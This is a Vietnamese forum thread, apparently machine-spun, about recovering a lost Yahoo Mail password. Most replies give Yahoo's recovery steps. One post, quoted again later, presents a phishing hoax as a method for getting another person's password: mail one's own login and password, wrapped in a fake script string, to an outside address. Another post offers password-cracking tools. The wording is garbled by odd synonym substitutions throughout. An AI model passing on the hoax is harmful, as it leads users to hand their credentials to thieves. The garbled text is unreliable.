Obrien

Có ai biết phần mềm nào lấy lại mật (an ninh) khẩu Yahoo!mail bất chỉ tui với.Thank nhiều lắm

Cuithbrig

Nếu bạn vừa bị mất mật (an ninh) khẩu Yahoo, cách duy nhất ban muốn lấy lại nó là bạn phải nhớ những thông tin khi bạn đăng kí Yahoo!Mail.

Ví dụ : Ngày, tháng, năm sinh , Câu hỏi bí mật (an ninh) ??

Duante

Bạn tham tiềmo bài này nhá : Lấy lại pass YAHOO :

Trong Yahoo có chức năng cho phép bạn tìm lại hộp thư bị mất một khi bạn vừa quên password hay có người nào đó vừa rắp tâm lấy password của bạn. Bạn trả toàn có thể lấy lại được hộp thư của mình với điều kiện vẫn còn nhớ những gì vừa khai báo trong lúc đăng ký hộp thư (nếu bạn quên luôn những thông tin vừa đăng ký thì xin chia buồn cùng bạn, vì bạn sẽ bất bao giờ lấy lại được hộp thư, ngoại trừ người lấy “ thành tâm sám hối ” trả lại hộp thư cho bạn). Cách lấy lại hộp thư như sau:

Trước tiên, bạn truy cập vào đất chỉ

. Kế tiếp, nhấp chuột vào Password lookup. Trang Yahoo! Sign-in Giúp đỡ sẽ xuất hiện. Tại mục Confirm Your Identity, bạn điền đầy đủ các thông tin cá nhân vừa khai báo khi đăng ký hộp thư như : ngày, tháng năm sinh, postcode, quốc gia. Sau đó điền ID của hộp thư cần tìm tại mục Forgot your password? rồi nhấn tiếp vào Get NEW Password. Nếu các thông tin bạn điền vào là chính xác, trang Receive a new password sẽ mở ra. Đến đây bạn vừa thực hiện được 50% trên bước đường tìm lại hộp thư của mình rồi đấy. Tiếp đến, ta có hai trường hợp phục hồi như sau :

* Trường hợp bạn nhớ câu trả lời bảo mật (an ninh) (Security Answer)

Để lấy lại được hộp thư, trong khung Show New Password on the Next Screen, bạn hãy điền vào câu trả lời bảo mật (an ninh) khi đăng ký hộp thư Yahoo. Cuối cùng nhấn nút Display New Password và chờ xem. Nếu trang My Yahoo! New Account Password xuất hiện thì xin chúc mừng bạn, Yahoo vừa tạo ra một password mới cho hộp thư của bạn. Password này được làm ra (tạo) một cách ngẫu nhiên nên sẽ rất khó nhớ. Do vậy bạn nên nhấp chuột tiếp vào liên kết Sign In and Change Your Password Now để thay đổi password.

* Trường hợp bạn quên câu trả lời bảo mật (an ninh)

Đối với trường hợp này, để lấy lại được hộp thư, trước đó bạn phải khai báo Alternate-mail trong hộp thư của mình. Alternate-mail là hộp thư phụ để khi bạn gặp sự cố với account, Yahoo có thể dùng nó liên lạc được với bạn. Có nhiều bạn khi đăng ký account bất để ý đến mục này, các bạn thường đăng ký lớn một cái tên Alt-mail bất kỳ, thậm chí có người bất thèm đăng ký Alt-mail...mặc dù nó rất quan trọng trong bất kỳ Account nào của Yahoo (bạn có thể tham tiềmo cách đăng ký ở cuối bài). Cách lấy lại password như sau : Ta sẽ yêu cầu Yahoo gửi password mới vào hộp thư Alt-mail bằng cách nhấp chuột tiếp vào mục Email New Password trong khung Send New Password by Email. Sau đó bạn chỉ chuyện qua hộp thư Alternate để nhận mail cung cấp password mới.

CÁCH KHAI BÁO ALTERNATE - MAIL CHO HỘP THƯ YAHOO

* Khai báo ngay khi đăng ký hộp thư mới : Bạn nhập vào mail cần thay thế trong khung Current Email. Sau khi làm ra (tạo) xong hộp thư Yahoo, bạn vào hộp mail thay thế và làm theo chỉ dẫn trong thư để trả tất chuyện xác nhận Alternate-mail.

* Khai báo sau khi vừa tạo xong hộp thư : Ta đăng nhập vào hộp thư Yahoo và sau đó chọn mục Mail Lựa chọn / Account Thông tin. Kế đến nhập vào password để vào trang Account Thông tin. Tại mục Thành viên Thông tin, ta bấm nút Edit để sửa thông tin. Sau đó nhập vào e-mail thay thế trong khung Alternate Email . Bấm Finished để trở lại màn hình Account Thông tin.

Vì Yahoo đòi hỏi bạn phải xác nhận đất chỉ mail này nên bạn hãy vào lại cửa sổ Edit Thành viên Thông tin chọn Nhấn vào đây to verify, tiếp đến bấm nút Verify Your Email Now. Yahoo sẽ gửi một mail xác nhận đến hộp thư thay thế của bạn.

Trong thư này bạn hãy click chuột vào liên kết “ Important! Please Nhấn vào đây to verify this e-mail address for your account ” để trả tất chuyện xác nhận.

Mong sẽ giúp được cho bạn.

Venjamin

đương nhiên mất vẫn là mất.. nhưng nếu ban đầu làm ra (tạo) mail mà là đầy đủ các bước thì cũng ổn quá nhỉ...
thế nên, mất thì hên xui, nhưng tiềm năng lấy lại chỉ là 0% á

vovaan

bạn vào coi clip này có phải là cái bạn cần bất nè

Burkhart

Lúc bạn đăng kí account với yahoo, bạn có điền thông tin về secondary email của bạn không? Nếu có thì yahoo có thể reset password của bạn và send cai new password vào secondary email cho bạn. Ngược lại, nếu bạn bất có secondary email thì tui cũng bất biết phải làm sao để lấy lại password (chắc là chỉ còn cách hack yahoo thôi )

Nếu có email thay thế thì bạn vào thì lúc đăng nhập bạn chọn "Forget your ID or password?" -> Tiếp tục đánh Yahoo ID vào rồi nhấn Continue -> Điền thông số nào bạn nhớ được trong các ô -> Đánh email thay thế vào ô "Enter your Email Address:" và nhấn "Find Yahoo ID" ^^!

Giles

còn cái này nữa nhưng không biết h con xai đưoc không bạn thử nha

Tất cả đều phải thực hiện tren account Yahoo mail của bạn bởi v´ bức tường lửa của họ vừa được nâng cấp bằng Unix-Apache sever.

1. Gửi một email tới: "[email protected]"

2. D?ng tieu đề Subject của email la: Find password.

3. Tiếp đến la nội dung email bạn đánh vao đoạn JScript sau:

/config/cgi-bin/start?v703&login= "Ten login của bạn"&f="password của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh them @yahoo.com nhe!)

Ví dụ:

Ten login của bạn la "hacker", password la "nobody" va đất chỉ muốn lấy pass la "[email protected]" chẳng hạn th´ bạn đánh như sau:

/config/cgi-bin/start?v703&login="hacker"&f="nobody"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="[email protected]"

*The Yahoo system cần password của bạn để họ có thể gửi một Javascript từ account của bạn tren Yahoo sever tới một password của người khác. Password sẽ tự động được gửi đến email của bạn trong dấu"".

Cách nay tuy dễ thực hiện nhưng tỷ lệ thanh công chỉ khoảng 70%, bởi v´ nếu Web Browser của bạn ma bất hỗ trợ JS th´ đanh bó tay thôi, sau 2 phút chờ đợi ma bất thấy Yahoo sever hồi âm th´ có lẽ bạn nên lập 1 nick yh khác

bongchay

Nhớ thông tin lúc lập Yahoo thì lấy lại được Pass, Nếu bất nhớ ---> bó chiếu !

chán wa

tui lấy mật (an ninh) khẩu yahoo hoài mà hok được chán wa

có ai giúp minh hok

mình thiệt la pó tay rùi là ơn giúp mình với

Chân Thành Cám ƠN Các Ban Giúp mình

Dearbourne

Trích:

lucky0410

Có ai biết phần mềm nào lấy lại mật (an ninh) khẩu Yahoo!mail bất chỉ tui với.Thank nhiều lắm

Ke ke, tui có mấy cái này. Không biết cách xài! Các pro vào tìm tòi cho tui học hỏi ké với.

Yahoo password zip

Yahoo password Demo: tự Cr-ack đi nhé

Retrieve_Forgotten_Yahoo_Password_53872

Hayes

Cho hỏi là tại sao bạn bị mất mật (an ninh) khẩu ??? Tự nhiên bị hack hay là nó không cánh mà bay vậy

shop_xxx

Trích:

t0rnad08x

còn cái này nữa nhưng không biết h con xai đưoc không bạn thử nha

Tất cả đều phải thực hiện tren account Yahoo mail của bạn bởi v´ bức tường lửa của họ vừa được nâng cấp bằng Unix-Apache sever.

1. Gửi một email tới: "[email protected]"

2. D?ng tieu đề Subject của email la: Find password.

3. Tiếp đến la nội dung email bạn đánh vao đoạn JScript sau:

/config/cgi-bin/start?v703&login= "Ten login của bạn"&f="password của bạn"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="địa chỉ muốn lấy pass" (nhớ phải đánh them @yahoo.com nhe!)

Ví dụ:

Ten login của bạn la "hacker", password la "nobody" va đất chỉ muốn lấy pass la "[email protected]" chẳng hạn th´ bạn đánh như sau:

/config/cgi-bin/start?v703&login="hacker"&f="nobody"&f= 27586&javascript=ACTIVE&rsa> infor/-password#="" send back/?v_&from="[email protected]"

*The Yahoo system cần password của bạn để họ có thể gửi một Javascript từ account của bạn tren Yahoo sever tới một password của người khác. Password sẽ tự động được gửi đến email của bạn trong dấu"".

Cách nay tuy dễ thực hiện nhưng tỷ lệ thanh công chỉ khoảng 70%, bởi v´ nếu Web Browser của bạn ma bất hỗ trợ JS th´ đanh bó tay thôi, sau 2 phút chờ đợi ma bất thấy Yahoo sever hồi âm th´ có lẽ bạn nên lập 1 nick yh khác

Mình làm theo cách của t0rnado8x thì nó có thư trả lời mình nhưng mình không biết nó nói pass của mình ở đâu ( toàn tiếng anh )

Berwynne

cho tui hỏi thế trong trường hợp quên mất ngựa code vs câu hỏi bí mật (an ninh) thì có thể tìm lại được mật (an ninh) khẩu yahoo không.

__________________________________________________ ___________

blog cá nhân

Kilydd

Mình muốn thay đổi lại "câu hỏi bí mật". (Hiện bjờ nick mình không chuyện j cả) không biết phải làm cách nào. mình không nhớ câu hỏi bí mật (an ninh) lúc lập

Fearnleah

Duy nhất 1 cách đó là nhớ những thông tin mà mình vừa ghi khi đăng kí acc yahoo.

Nếu bất thì chẳng có cách nào hết.

Siegfried

Nhớ ngày tháng lúc đăng ký thui. còn câu hỏi bí mật (an ninh) không nhớ. Hình như có một cách là gửi mail đến "yahoo" để yêu cầu đổi lại. Hok biết dùng như thế nào? Thanks

Bromleah

Như anh Long nói rồi.Ngoài ra, k có những thông tin đó thì chụi chết, bất lấy lại được.

Các chủ đề có liên quan khác